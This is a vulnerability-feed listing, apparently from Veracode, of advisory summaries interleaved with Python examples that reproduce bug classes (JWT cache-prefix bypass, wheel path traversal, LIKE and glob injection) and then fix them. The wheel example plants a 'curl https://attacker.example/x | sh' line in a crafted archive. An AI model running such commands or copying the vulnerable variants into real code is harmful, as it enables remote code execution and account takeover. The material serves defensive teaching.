Veracode (recent)

38287 matches found

Veracode • added 2026/04/04 5:33 a.m.

FastMCP OpenAPI Provider Has An SSRF & Path Traversal Vulnerability

Technical Description The "OpenAPIProvider" in FastMCP exposes internal APIs to MCP clients by parsing OpenAPI specifications. The "RequestDirector" class is responsible for constructing HTTP requests to the backend service. A critical vulnerability exists in the "buildurl" method. When an OpenAP...

CVSS 10 • AI score 5.9 • EPSS 0.01075
Exploits: 1 • Affected software: 1
Veracode • added 2026/04/04 5:32 a.m.

SQL Injection

alerta-server is vulnerable to SQL Injection. The vulnerability is due to direct interpolation of user-supplied query parameters into SQL statements without sanitization, which allows an attacker to inject and execute arbitrary SQL queries...

CVSS 9.8 • AI score 6.1 • EPSS 0.00505
Exploits: 0 • References: 6 • Affected software: 1
Veracode • added 2026/04/04 5:32 a.m.

AIOHTTP Leaks Cookie And Proxy-Authorization Headers On Cross-origin Redirect

Summary When following redirects to a different origin, aiohttp drops the Authorization header, but retains the Cookie and Proxy-Authorization headers. Impact The Cookie and Proxy-Authorization headers could contain sensitive information which may be leaked to an unintended party after following...

CVSS 6.9 • AI score 5.8 • EPSS 0.00337
Exploits: 0 • Affected software: 1
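The redirect policy the aiohttp entry above describes, as an added example that is not aiohttp's own code: a pure function that decides which request headers survive a redirect. The set of credential headers, the origin comparison and the sample headers are assumptions for this illustration; `strip_all_credentials=False` reproduces the leaky behaviour (only `Authorization` dropped), the default is the hardened policy.

```python
from urllib.parse import urlsplit

# Request headers that carry credentials. The advisory's point is that only the
# first of these was being dropped on a cross-origin redirect.
CREDENTIAL_HEADERS = frozenset({"authorization", "cookie", "proxy-authorization"})

DEFAULT_PORTS = {"http": 80, "https": 443}


def origin_of(url):
    """(scheme, host, port) of a URL, with the scheme's default port filled in."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    host = (parts.hostname or "").lower()
    port = parts.port if parts.port is not None else DEFAULT_PORTS.get(scheme)
    return (scheme, host, port)


def headers_for_redirect(headers, from_url, to_url, strip_all_credentials=True):
    """Headers to send when following a redirect from from_url to to_url.

    strip_all_credentials=False reproduces the leaky behaviour in the advisory
    (only Authorization is dropped); the default is the hardened policy.
    Same-origin redirects keep every header.
    """
    if origin_of(from_url) == origin_of(to_url):
        return dict(headers)
    to_drop = CREDENTIAL_HEADERS if strip_all_credentials else frozenset({"authorization"})
    return {k: v for k, v in headers.items() if k.lower() not in to_drop}


# Constructed sample request headers for the demo (not captured traffic).
SAMPLE_HEADERS = {
    "Authorization": "Bearer demo-token",
    "Cookie": "session=demo-session",
    "Proxy-Authorization": "Basic ZGVtbzpkZW1v",
    "Accept": "application/json",
}


def demo(strip_all_credentials):
    """Names of the headers that would reach attacker.example after a cross-origin 302."""
    sent = headers_for_redirect(
        SAMPLE_HEADERS,
        "https://api.example.com/v1/me",
        "https://attacker.example/collect",
        strip_all_credentials=strip_all_credentials,
    )
    return sorted(sent)
```

Note that a scheme downgrade (https to http on the same host) is treated as a different origin and also strips credentials; an implementation that compares only the hostname would forward cookies over plaintext.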
Veracode • added 2026/04/04 5:31 a.m.

Authentication Bypass

litellm is vulnerable to Authentication Bypass. The vulnerability is due to weak cache key generation using only the first 20 characters of JWT tokens, which allows an attacker to craft a token with a matching prefix and gain unauthorized access by inheriting another user’s identity...

CVSS 9.4 • AI score 5.8 • EPSS 0.00395
Exploits: 1 • References: 2 • Affected software: 1
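Why a 20-character prefix is a useless cache key for JWTs, as an added example that is not litellm's code: the first segment of every HS256 token is the base64url encoding of the same header, `{"alg":"HS256","typ":"JWT"}`, which is 36 characters long, so any two tokens share their first 20 characters. The cache class, the key functions, the secret and the claims below are constructed for this illustration; the hardened variant keys on a SHA-256 of the whole token.

```python
import base64
import hashlib
import hmac
import json


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def make_hs256_jwt(claims: dict, secret: bytes) -> str:
    """Mint an HS256 JWT with the standard library (constructed test data)."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = _b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = _b64url(hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest())
    return f"{header}.{payload}.{sig}"


def verify_hs256(token: str, secret: bytes) -> str:
    """Return the 'sub' claim after checking the signature; raise on a bad token."""
    header, payload, sig = token.split(".")
    expected = _b64url(hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest())
    if not hmac.compare_digest(sig, expected):
        raise ValueError("bad signature")
    padded = payload + "=" * (-len(payload) % 4)
    return json.loads(base64.urlsafe_b64decode(padded))["sub"]


def weak_cache_key(token: str) -> str:
    # The flaw described in the advisory: only the first 20 characters are used.
    return token[:20]


def strong_cache_key(token: str) -> str:
    # Hardened: hash the entire token so distinct tokens never share a key.
    return hashlib.sha256(token.encode()).hexdigest()


class AuthCache:
    """Hypothetical verification cache: returns the cached identity on a key hit."""

    def __init__(self, key_fn):
        self.key_fn = key_fn
        self._store = {}

    def lookup_or_verify(self, token, verify):
        key = self.key_fn(token)
        if key in self._store:
            return self._store[key]          # cache hit: signature never checked
        identity = verify(token)
        self._store[key] = identity
        return identity


def demo(key_fn):
    """Admin logs in, then a forged token with a bogus signature is presented.

    Returns the identity the cache hands the forger, or None if it was rejected.
    """
    secret = b"constructed-demo-secret"
    verify = lambda t: verify_hs256(t, secret)
    cache = AuthCache(key_fn)
    admin_token = make_hs256_jwt({"sub": "admin"}, secret)
    cache.lookup_or_verify(admin_token, verify)      # legitimate request fills the cache
    header = admin_token.split(".")[0]
    forged = header + "." + _b64url(b'{"sub":"mallory"}') + ".not-a-valid-signature"
    try:
        return cache.lookup_or_verify(forged, verify)
    except ValueError:
        return None
```

With the weak key the forged token is never verified at all: the prefix hits the admin's cache entry and the request runs as admin. Hashing the full token makes the forged token miss the cache and fail signature verification.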
Veracode • added 2026/04/04 5:30 a.m.

Cross-Origin Data Theft

Glances is vulnerable to Cross-Origin Data Theft via XML-RPC Server CORS Misconfiguration. The vulnerability is due to the XML-RPC handler not validating the Content-Type header, where an attacker-controlled webpage can issue a CORS simple request containing a valid XML-RPC payload, and the serve...

CVSS 7.1 • AI score 5.7 • EPSS 0.00409
Exploits: 1 • References: 3 • Affected software: 1
Veracode • added 2026/04/04 5:29 a.m.

Poetry Has Wheel Path Traversal Which Can Lead To Arbitrary File Write

Summary A crafted wheel can contain ../ paths that Poetry writes to disk without containment checks, allowing arbitrary file write with the privileges of the Poetry process. Impact Arbitrary file write path traversal from untrusted wheel content. Impacts users/CI/CD systems installing malicious o...

CVSS 7.1 • AI score 5.8 • EPSS 0.00468
Exploits: 1 • Affected software: 1
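The containment check the Poetry entry above says was missing, as an added example that is not Poetry's code: a wheel is a zip, so the extractor resolves every member name against the install root before writing anything and refuses the whole archive if any member escapes. The wheel contents and the `../../.bashrc` payload are constructed for this illustration; `is_contained` compares real paths so symlinked roots (for example `/tmp` on macOS) are handled.

```python
import io
import os
import tempfile
import zipfile


def build_wheel_bytes(members):
    """Build an in-memory zip standing in for a wheel (constructed test data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


def is_contained(root, member_name):
    """True if root/member_name resolves to a path inside root."""
    root = os.path.realpath(root)
    target = os.path.realpath(os.path.join(root, member_name))
    return os.path.commonpath([root, target]) == root


def extract_wheel(wheel_bytes, dest):
    """Extract a wheel into dest, refusing the whole archive if any member escapes."""
    with zipfile.ZipFile(io.BytesIO(wheel_bytes)) as zf:
        names = zf.namelist()
        # Validate every member before writing anything: all-or-nothing, so a
        # crafted archive cannot leave a half-installed package behind.
        for name in names:
            if os.path.isabs(name) or name.startswith(("/", "\\")) or not is_contained(dest, name):
                raise ValueError(f"refusing member outside install root: {name!r}")
        written = []
        for name in names:
            out = os.path.join(dest, name)
            if name.endswith("/"):
                os.makedirs(out, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(out), exist_ok=True)
            with open(out, "wb") as fh:
                fh.write(zf.read(name))
            written.append(name)
    return written


def demo():
    """Install a benign and a crafted wheel; return (files written, crafted one rejected?)."""
    benign = build_wheel_bytes({
        "pkg/__init__.py": b"VERSION = '1.0'\n",
        "pkg-1.0.dist-info/METADATA": b"Name: pkg\nVersion: 1.0\n",
    })
    crafted = build_wheel_bytes({
        "pkg/__init__.py": b"",
        "../../.bashrc": b"curl https://attacker.example/x | sh\n",  # constructed payload
    })
    with tempfile.TemporaryDirectory() as tmp:
        site = os.path.join(tmp, "site-packages")
        os.makedirs(site)
        written = extract_wheel(benign, site)
        try:
            extract_wheel(crafted, site)
            rejected = False
        except ValueError:
            rejected = True
    return written, rejected
```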
Veracode • added 2026/04/04 5:29 a.m.

SQL Injection

baserCMS is vulnerable to SQL injection. The vulnerability is due to insufficient input validation in the blog post functionality, where malicious SQL may be executed in blog posts and attackers can inject crafted SQL statements to manipulate the database...

CVSS 9.8 • AI score 5.9 • EPSS 0.00412
Exploits: 0 • References: 3 • Affected software: 1
Veracode • added 2026/04/04 5:28 a.m.

Remote Code Execution

D-Tale is vulnerable to Remote Code Execution. The vulnerability is due to the use of redis or shelf storage layer, where users hosting D-Tale publicly could allow attackers to run malicious code on the server...

CVSS 9.8 • AI score 5.5 • EPSS 0.00622
Exploits: 0 • References: 2 • Affected software: 1
Veracode • added 2026/04/04 5:28 a.m.

JupyterHub Has An Open Redirect Vulnerability

Affected Version JupyterHub <= 5.4.3 Impact An open redirect vulnerability in JupyterHub <= 5.4.3 allows attackers to construct links which, when clicked, take users to the JupyterHub login page, after which they are sent to an arbitrary attacker-controlled site outside JupyterHub instead of a...

CVSS 6.1 • AI score 5.9 • EPSS 0.00224
Exploits: 0 • Affected software: 1
Veracode • added 2026/04/04 5:28 a.m.

Privilege Escalation

LiteLLM is vulnerable to Privilege Escalation. The vulnerability is due to missing admin authorization checks on the /config/update endpoint, which allows an authenticated attacker to modify configurations, execute arbitrary code, and access sensitive data...

CVSS 8.8 • AI score 6 • EPSS 0.27194
Exploits: 2 • References: 4 • Affected software: 1
Veracode • added 2026/04/04 5:27 a.m.

Path Traversal

ONNX is vulnerable to Path Traversal. The vulnerability is due to improper handling of symlinks allowing directory traversal, which allows an attacker to access and read arbitrary files outside the intended directory...

CVSS 8.7 • AI score 5.9 • EPSS 0.00522
Exploits: 1 • References: 2 • Affected software: 1
Veracode • added 2026/04/04 5:24 a.m.

Improper Privilege Management

ci4-cms-erp/ci4ms is vulnerable to Cross-Site Scripting (XSS). The vulnerability is due to improper sanitization and output encoding of user-controlled profile name input, which allows an attacker to inject and execute malicious JavaScript in application views...

CVSS 9.4 • AI score 5.9 • EPSS 0.00297
Exploits: 1 • References: 2 • Affected software: 1
Veracode • added 2026/04/04 5:23 a.m.

PhpMyFAQ Has A LIKE Wildcard Injection In Search.php — Unescaped % And _ Metacharacters Enable Broad Content Disclosure

Summary The "searchCustomPages" method in "phpmyfaq/src/phpMyFAQ/Search.php" uses "real_escape_string" via "escape" to sanitize the search term before embedding it in LIKE clauses. However, "real_escape_string" does not escape SQL LIKE metacharacters: "%" (match any sequence) and "_" (match any single...

CVSS 6.9 • AI score 5.9 • EPSS 0.00336
Exploits: 1 • Affected software: 1
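The bug class in the phpMyFAQ entry above, reproduced and fixed as an added example that is not phpMyFAQ's code: the query is already parameterised (no classic SQL injection), yet a search term of `%` or `_nternal` still widens the LIKE match to content the user should not be able to enumerate. The fix escapes `%`, `_` and the escape character itself and declares that escape character with `ESCAPE` in the query. sqlite3 stands in for MySQL here, and the table and rows are constructed for the illustration.

```python
import sqlite3

# Constructed custom-page content; "Internal" rows are what the wildcard leaks.
SAMPLE_PAGES = [
    "Public: how to reset your password",
    "Internal: staging DB host is db-stage-01",
    "Internal: VPN onboarding checklist",
    "Discount: 50% off for partners",
]


def escape_like(term, esc="\\"):
    """Escape LIKE metacharacters. Must be paired with ESCAPE '\\' in the query.

    The escape character goes first so it is not double-processed afterwards.
    """
    return (term.replace(esc, esc + esc)
                .replace("%", esc + "%")
                .replace("_", esc + "_"))


def setup():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE faqcustompages (id INTEGER PRIMARY KEY, content TEXT)")
    conn.executemany("INSERT INTO faqcustompages (content) VALUES (?)",
                     [(row,) for row in SAMPLE_PAGES])
    return conn


def search_vulnerable(conn, term):
    """Parameterised, so quotes are safe, but % and _ in `term` act as wildcards."""
    rows = conn.execute(
        "SELECT content FROM faqcustompages WHERE content LIKE ?",
        ("%" + term + "%",))
    return [r[0] for r in rows]


def search_fixed(conn, term):
    """Metacharacters in `term` are escaped, so only literal matches are returned."""
    rows = conn.execute(
        "SELECT content FROM faqcustompages WHERE content LIKE ? ESCAPE '\\'",
        ("%" + escape_like(term) + "%",))
    return [r[0] for r in rows]
```

The `ESCAPE` clause is the part most often forgotten: escaping the term without declaring the escape character makes the backslash itself a literal and the wildcards stay live.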
Veracode • added 2026/04/04 5:20 a.m.

OS Command Injection

baserCMS is vulnerable to OS command injection. The vulnerability is due to insufficient validation in the installer, where user‑controlled input is passed to the operating system and attackers can execute arbitrary commands by accessing the uninstalled application...

CVSS 9.8 • AI score 7.4 • EPSS 0.02059
Exploits: 0 • References: 3 • Affected software: 1
Veracode • added 2026/04/02 2:24 p.m.

Arbitrary Code Injection

org.springframework.ai:spring-ai-vector-store is vulnerable to Arbitrary Code Injection. The vulnerability is due to unsafe use of user-supplied input as a filter expression key in SimpleVectorStore, which allows an attacker to inject malicious expressions and execute arbitrary code...

CVSS 9.8 • AI score 6.1 • EPSS 0.00821
Exploits: 0 • References: 5 • Affected software: 1
Veracode • added 2026/04/01 9:53 a.m.

Improper Access Control

Cilium is vulnerable to improper access control. The vulnerability is due to missing validation of non-existent or unattached AWS security group IDs in egress policies, which allows an attacker to gain broader outbound network access than intended by the policy configuration...

CVSS 5.5 • AI score 7.1 • EPSS 0.00158
Exploits: 0 • References: 6 • Affected software: 2
Veracode • added 2026/03/31 11:02 a.m.

Arbitrary Code Execution

@anthropic-ai/claude-code is vulnerable to Arbitrary Code Execution. The vulnerability is due to improper parsing of shell commands involving $IFS and short CLI flags, which allows an attacker to bypass read-only validation and execute arbitrary code by injecting untrusted content into the contex...

CVSS 9.8 • AI score 6.2 • EPSS 0.00628
Exploits: 0 • References: 2 • Affected software: 1
Veracode • added 2026/03/31 10:44 a.m.

Improper Access Control

github.com/mattermost/mattermost is vulnerable to improper access control. The vulnerability is due to insufficient validation of user permissions when accessing files and subscribing to board blocks, which allows an authenticated attacker to access files and subscribe to blocks from boards they...

CVSS 4.3 • AI score 7.1 • EPSS 0.00186
Exploits: 0 • References: 3 • Affected software: 2
Veracode • added 2026/03/31 10:06 a.m.

Improper Certificate Validation

github.com/envoyproxy/envoy is vulnerable to improper certificate validation. The vulnerability is due to incorrect handling of embedded null bytes (\0) in OTHERNAME SAN values within mTLS certificate matching, which allows an attacker to bypass certificate validation and achieve unauthorized acces...

CVSS 7.1 • AI score 5.9 • EPSS 0.00157
Exploits: 1 • References: 2 • Affected software: 1
Veracode • added 2026/03/31 9:31 a.m.

Improper Input Validation

github.com/eclipse/paho.mqtt.golang is vulnerable to improper input validation. The vulnerability is due to unsafe conversion of string length from int32/int64 to int16 without overflow checks, which allows an attacker to craft oversized UTF-8 inputs that cause packet corruption or unintended dat...

CVSS 6.3 • AI score 7.2 • EPSS 0.00189
Exploits: 0 • References: 6 • Affected software: 1
Veracode • added 2026/03/31 8:45 a.m.

Prototype Pollution

Axios is vulnerable to Prototype Pollution. The vulnerability is due to the mergeConfig function crashing with a TypeError when processing configuration objects containing __proto__ as an own property, where an attacker can trigger this by providing a malicious configuration object created via...

CVSS 7.5 • AI score 7 • EPSS 0.01242
Exploits: 1 • References: 7 • Affected software: 2
Veracode • added 2026/03/31 3:55 a.m.

Predictable UUID Generation

github.com/gofiber/utils is vulnerable to predictable UUID generation. The vulnerability is due to fallback to predictable UUID values when crypto/rand.Read fails, which allows an attacker to guess UUIDs and exploit security-critical operations relying on them...

CVSS 9.8 • AI score 5.9 • EPSS 0.00402
Exploits: 0 • References: 4 • Affected software: 1
Veracode • added 2026/03/31 3:55 a.m.

Improper Authentication

github.com/1panel-dev/1panel is vulnerable to improper authentication. The vulnerability is due to improper server-side validation of a client-controlled parameter, which allows an unauthenticated attacker to bypass CAPTCHA protections and perform automated login attempts leading to potential...

CVSS 7.5 • AI score 7.2 • EPSS 0.0039
Exploits: 0 • References: 4 • Affected software: 2
Veracode • added 2026/03/30 8:46 a.m.

Server-Side Request Forgery (SSRF)

github.com/zitadel/zitadel is vulnerable to an unauthenticated full-read Server-Side Request Forgery (SSRF). The vulnerability is due to improper trust of the x-zitadel-forward-host header in the Login UI V2, which allows an attacker to force the server to make arbitrary HTTP requests and read...

CVSS 9.3 • AI score 7.2 • EPSS 0.00452
Exploits: 2 • References: 3 • Affected software: 1
Veracode • added 2026/03/30 8:39 a.m.

DOM-Based Cross-Site Scripting (XSS)

github.com/zitadel/zitadel is vulnerable to DOM-Based Cross-Site Scripting (XSS). The vulnerability is due to improper validation of the post_logout_redirect parameter in the /logout endpoint, which allows an unauthenticated remote attacker to execute malicious JavaScript in users’ browsers...

CVSS 8 • AI score 6 • EPSS 0.00261
Exploits: 0 • References: 3 • Affected software: 1
Veracode • added 2026/03/30 6:49 a.m.

Race Condition

@auth0/nextjs-auth0 is vulnerable to a race condition. The vulnerability is due to improper lookup handling in the TokenRequestCache during simultaneous requests on the same client, which allows an attacker to exploit inconsistent token responses and potentially interfere with authentication flow...

CVSS 5.4 • AI score 5.9 • EPSS 0.00172
Exploits: 0 • References: 3 • Affected software: 1
Veracode • added 2026/03/30 4:38 a.m.

Denial Of Service (DoS)

github.com/quic-go/quic-go is vulnerable to a Denial Of Service (DoS). The vulnerability is due to missing limits on the size of decoded HTTP/3 headers from QPACK-encoded HEADERS frames, which allows an attacker to send crafted requests with large header fields to trigger excessive memory allocatio...

CVSS 5.3 • AI score 5.9 • EPSS 0.00325
Exploits: 0 • References: 3 • Affected software: 1
Veracode • added 2026/03/28 5:32 a.m.

Rails Active Storage Has A Possible DoS Vulnerability In Proxy Mode Via Multi-range Requests

Impact Active Storage's proxy controller does not limit the number of byte ranges in an HTTP Range header. A request with thousands of small ranges causes disproportionate CPU usage compared to a normal request for the same file, possibly resulting in a DoS vulnerability. Releases The fixed...

CVSS 6.5 • AI score 5.8 • EPSS 0.00434
Exploits: 0 • Affected software: 1
Veracode • added 2026/03/28 5:32 a.m.

Path Traversal

Active Storage is vulnerable to Path Traversal. The vulnerability is due to Active Storage's DiskService#path_for not validating that the resolved filesystem path remains within the storage root directory, where a blob key containing path traversal sequences (e.g. ../) could allow reading, writing, o...

CVSS 9.8 • AI score 6 • EPSS 0.00603
Exploits: 0 • References: 7 • Affected software: 1
Veracode • added 2026/03/28 5:32 a.m.

Arbitrary Code Injection

Langflow is vulnerable to Arbitrary Code Injection. The vulnerability is due to the validation process dynamically executing LLM‑generated Python code via exec, where the validation routine runs the generated code and an attacker who can influence the model output can achieve arbitrary server‑sid...

CVSS 9.9 • AI score 6.1 • EPSS 0.01426
Exploits: 1 • References: 17 • Affected software: 1
Veracode • added 2026/03/28 5:31 a.m.

Remote Code Execution (RCE)

Indico is vulnerable to Remote Code Execution (RCE). The vulnerability is due to improper sanitization of LaTeX input allowing bypass via crafted syntax, which allows an attacker to read local files or execute arbitrary code on the server when LaTeX rendering is enabled...

CVSS 8.8 • AI score 6.3 • EPSS 0.00782
Exploits: 0 • References: 6 • Affected software: 1
Veracode • added 2026/03/28 5:31 a.m.

Denial Of Service (DoS)

Active Support is vulnerable to Denial of Service. The vulnerability is due to the acceptance of strings containing scientific notation by Active Support number helpers, where the conversion of these strings to extremely large decimal representations can cause excessive memory allocation and CPU...

CVSS 8.7 • AI score 5.9 • EPSS 0.0061
Exploits: 0 • References: 7 • Affected software: 1
Veracode • added 2026/03/28 5:31 a.m.

Privilege Escalation

Signify is vulnerable to Privilege Escalation. The vulnerability is due to improper Authenticode signature validation in signeddata.py and context.py, where a remote attacker can escalate privileges via these components and exploit the vulnerability to gain elevated access...

CVSS 8.8 • AI score 6 • EPSS 0.00343
Exploits: 0 • References: 6 • Affected software: 1
Veracode • added 2026/03/28 5:31 a.m.

Cryptography Has Incomplete DNS Name Constraint Enforcement On Peer Names

Summary In versions of cryptography prior to 46.0.5, DNS name constraints were only validated against SANs within child certificates, and not the "peer name" presented during each validation. Consequently, cryptography would allow a peer named "bar.example.com" to validate against a wildcard leaf...

CVSS 6.5 • AI score 6.7 • EPSS 0.0027
Exploits: 0 • Affected software: 1
Veracode • added 2026/03/28 5:30 a.m.

Infinite Loop

pypdf is vulnerable to an Infinite Loop. The vulnerability is due to reading a file in non‑strict mode during dictionary recovery, where the DictionaryObject.read_from_stream method can enter an infinite loop and an attacker can craft a PDF to trigger it...

CVSS 8.2 • AI score 5.9 • EPSS 0.00455
Exploits: 0 • References: 4 • Affected software: 1
Veracode • added 2026/03/28 5:29 a.m.

Deserialization Of Untrusted Data

Saloon is vulnerable to Deserialization Of Untrusted Data. The vulnerability is due to unsafe use of PHP’s unserialize with allowed_classes enabled when restoring OAuth token state, which allows an attacker to supply malicious serialized objects and trigger execution of arbitrary code via gadget...

CVSS 9.8 • AI score 6.3 • EPSS 0.00622
Exploits: 0 • References: 3 • Affected software: 1
Veracode • added 2026/03/28 5:29 a.m.

Server-side Template Injection

giskard-agents is vulnerable to server-side template injection. The vulnerability is due to the ChatWorkflow.chat method passing its string argument directly to a non‑sandboxed Jinja2 Environment, where the input string is treated as a template by inline_env.from_string and an attacker can supply...

CVSS 8.8 • AI score 6.2 • EPSS 0.00611
Exploits: 1 • References: 2 • Affected software: 1
Veracode • added 2026/03/28 5:29 a.m.

Improper Authorization

Langflow is vulnerable to Improper Authorization. The vulnerability is due to improper access control in the read_flow helper, which failed to enforce ownership validation when authentication was enabled, allowing an authenticated attacker to read, modify, or delete flows belonging to other...

CVSS 8.8 • AI score 5.9 • EPSS 0.00406
Exploits: 0 • References: 5 • Affected software: 2
Veracode • added 2026/03/28 5:29 a.m.

Session Hijacking

MCP Ruby SDK is vulnerable to Session Hijacking. The vulnerability is due to insufficient session binding, where an attacker who obtains a valid session ID can completely hijack the victim's Server-Sent Events (SSE) stream and intercept all real-time data...

CVSS 8.2 • AI score 5.7 • EPSS 0.00465
Exploits: 1 • References: 8 • Affected software: 1
Veracode • added 2026/03/28 5:29 a.m.

Cross Site Scripting

Active Support is vulnerable to Cross Site Scripting. The vulnerability is due to SafeBuffer#% not propagating the @html_unsafe flag to the newly created buffer, where a SafeBuffer is mutated in place and then formatted with % using untrusted arguments, and the result incorrectly reports html_safe? ...

CVSS 6.1 • AI score 5.8 • EPSS 0.00327
Exploits: 0 • References: 7 • Affected software: 1
Veracode • added 2026/03/28 5:29 a.m.

Improper Input Validation

activestorage is vulnerable to Improper Input Validation. The vulnerability is due to unescaped use of blob keys in Dir.glob within DiskService#delete_prefixed, which allows an attacker to inject glob metacharacters and delete unintended files from the storage directory...

CVSS 9.1 • AI score 5.9 • EPSS 0.00646
Exploits: 0 • References: 7 • Affected software: 2
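The glob-metacharacter problem in the activestorage entry above, shown with Python's `glob` as an added example that is not Active Storage's code: a prefix-delete that interpolates the key raw into the pattern lets `*`, `?` or `[...]` in the key match every blob in the store, while `glob.escape` on both the root and the key pins the match to the literal prefix. The blob names and the store layout are constructed for this illustration.

```python
import glob
import os
import tempfile

# Constructed blob keys; only the "abc123" ones should go when that prefix is deleted.
SAMPLE_BLOBS = ["abc123", "abc123variant1", "def456", "zzz999"]


def make_store(root):
    for name in SAMPLE_BLOBS:
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(b"blob")
    return root


def delete_prefixed_vulnerable(root, prefix):
    """Key interpolated raw into the pattern: '*', '?' and '[...]' widen the match."""
    removed = []
    for path in glob.glob(os.path.join(root, prefix + "*")):
        os.remove(path)
        removed.append(os.path.basename(path))
    return sorted(removed)


def delete_prefixed_fixed(root, prefix):
    """Escape both the root and the prefix so only the literal prefix matches."""
    pattern = os.path.join(glob.escape(root), glob.escape(prefix) + "*")
    removed = []
    for path in glob.glob(pattern):
        os.remove(path)
        removed.append(os.path.basename(path))
    return sorted(removed)


def demo(prefix):
    """Run both variants against fresh stores; return (vulnerable removed, fixed removed)."""
    with tempfile.TemporaryDirectory() as a, tempfile.TemporaryDirectory() as b:
        vuln = delete_prefixed_vulnerable(make_store(a), prefix)
        fixed = delete_prefixed_fixed(make_store(b), prefix)
    return vuln, fixed
```

Escaping the root matters as much as escaping the key: a storage directory whose own path contains `[` or `*` would otherwise silently change what the pattern matches. An allow-list on the key alphabet (Active Storage keys are base36) is the belt to this braces and rejects such keys before they reach the filesystem at all.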
Veracode • added 2026/03/28 5:28 a.m.

Denial Of Service

Active Storage is vulnerable to Denial of Service. The vulnerability is due to the proxy controller loading the entire requested byte range into memory before sending it, where a request with a large or unbounded Range header could cause the server to allocate memory proportional to the file size...

CVSS 8.7 • AI score 5.8 • EPSS 0.0061
Exploits: 0 • References: 7 • Affected software: 1
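Both Active Storage proxy-controller entries above (the multi-range CPU issue and the whole-range-in-memory issue) come down to how a `Range` header is parsed and served, so here is one Range handler as an added example that is not Rails code: it caps the number of ranges per request, discards unsatisfiable parts, and streams each range in fixed-size chunks so the largest buffer allocated is the chunk size rather than the requested length. The cap of 5 ranges, the 64 KiB chunk and the 1 MiB sample file are assumptions for this illustration.

```python
import io

MAX_RANGES = 5           # assumed cap on ranges per request
CHUNK_SIZE = 64 * 1024   # assumed streaming chunk size


class RangeError(ValueError):
    """A Range header the server refuses (answer 400 or 416)."""


def parse_ranges(header, size, max_ranges=MAX_RANGES):
    """Parse a Range header into (start, end_inclusive) pairs for a file of `size` bytes.

    Returns None when there is no Range header (serve the whole file with 200).
    Raises RangeError for too many ranges, malformed syntax, or nothing satisfiable.
    """
    if not header:
        return None
    if not header.startswith("bytes="):
        raise RangeError("unsupported range unit")
    specs = [s.strip() for s in header[len("bytes="):].split(",") if s.strip()]
    if len(specs) > max_ranges:
        raise RangeError(f"too many ranges: {len(specs)} > {max_ranges}")
    ranges = []
    for spec in specs:
        start_s, sep, end_s = spec.partition("-")
        if not sep or (not start_s and not end_s):
            raise RangeError(f"malformed range: {spec!r}")
        try:
            if not start_s:                         # suffix form: last N bytes
                n = int(end_s)
                if n <= 0:
                    continue
                start, end = max(size - n, 0), size - 1
            else:
                start = int(start_s)
                end = size - 1 if not end_s else min(int(end_s), size - 1)
        except ValueError:
            raise RangeError(f"malformed range: {spec!r}") from None
        if start > end or start >= size:
            continue                                # unsatisfiable part, ignore it
        ranges.append((start, end))
    if not ranges:
        raise RangeError("no satisfiable range")
    return ranges


def stream_range(fileobj, start, end, chunk_size=CHUNK_SIZE):
    """Yield bytes start..end (inclusive) in bounded chunks, never the whole range at once."""
    fileobj.seek(start)
    remaining = end - start + 1
    while remaining > 0:
        data = fileobj.read(min(chunk_size, remaining))
        if not data:
            break
        remaining -= len(data)
        yield data


def peak_chunk(fileobj, start, end, chunk_size=CHUNK_SIZE):
    """Largest single buffer the streaming path allocates for this range."""
    return max(len(chunk) for chunk in stream_range(fileobj, start, end, chunk_size))


def serve(fileobj, size, range_header):
    """Stand-in for the proxy controller: (status, list of per-range bodies)."""
    ranges = parse_ranges(range_header, size)
    if ranges is None:
        return 200, [b"".join(stream_range(fileobj, 0, size - 1))]
    return 206, [b"".join(stream_range(fileobj, s, e)) for s, e in ranges]


def sample_file():
    """Constructed 1 MiB file so the demo runs offline."""
    return io.BytesIO(bytes(range(256)) * 4096)
```

`serve` joins the chunks only to make the result easy to inspect; a real controller would write each chunk to the response as it is produced, which is what keeps memory bounded for a `bytes=0-` request on a multi-gigabyte blob.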
Veracode • added 2026/03/28 5:28 a.m.

Remote Code Execution (RCE)

ruby-lsp is vulnerable to Remote Code Execution (RCE). The vulnerability is due to unsanitized interpolation of the rubyLsp.branch setting into a generated Gemfile, which allows an attacker to inject malicious code that executes when a user opens a crafted project...

CVSS 9.8 • AI score 6.1 • EPSS 0.00479
Exploits: 0 • References: 2 • Affected software: 1
Veracode • added 2026/03/28 5:28 a.m.

Cross-Site Scripting

Home Assistant is vulnerable to Cross-Site Scripting. The vulnerability is due to an authenticated party adding a malicious name to their device entity, where the malicious name allows for Cross-Site Scripting attacks against anyone who can see a dashboard with a Map-card which includes that...

CVSS 8.8 • AI score 5.2 • EPSS 0.00241
Exploits: 1 • References: 2 • Affected software: 2
Veracode • added 2026/03/28 5:26 a.m.

Path Traversal

saloonphp/saloon is vulnerable to Path Traversal. The vulnerability is due to lack of validation of fixture names used in file path construction, which allows an attacker to manipulate paths and read or write arbitrary files outside the intended directory...

CVSS 9.3 • AI score 6 • EPSS 0.00566
Exploits: 0 • References: 3 • Affected software: 1
Veracode • added 2026/03/28 5:25 a.m.

Server-Side Request Forgery

pyLoad is vulnerable to Server-Side Request Forgery. The vulnerability is due to the download engine accepting arbitrary URLs without validation, where an authenticated attacker can exploit this to access internal network services and exfiltrate cloud provider metadata...

CVSS 9.3 • AI score 5.8 • EPSS 0.00397
Exploits: 1 • References: 2 • Affected software: 1
Veracode • added 2026/03/28 5:23 a.m.

Environment Variable Leak

changedetection.io is vulnerable to Environment Variable Leak. The vulnerability is due to the use of the jq `env` builtin in include filter expressions, where an authenticated user can leak sensitive environment variables including SALTED_PASS, PLAYWRIGHT_DRIVER_URL, HTTP_PROXY, and any secrets passed...

CVSS 8.3 • AI score 5.7 • EPSS 0.00475
Exploits: 1 • References: 3 • Affected software: 1
Veracode • added 2026/03/28 5:23 a.m.

Cross-Site Scripting

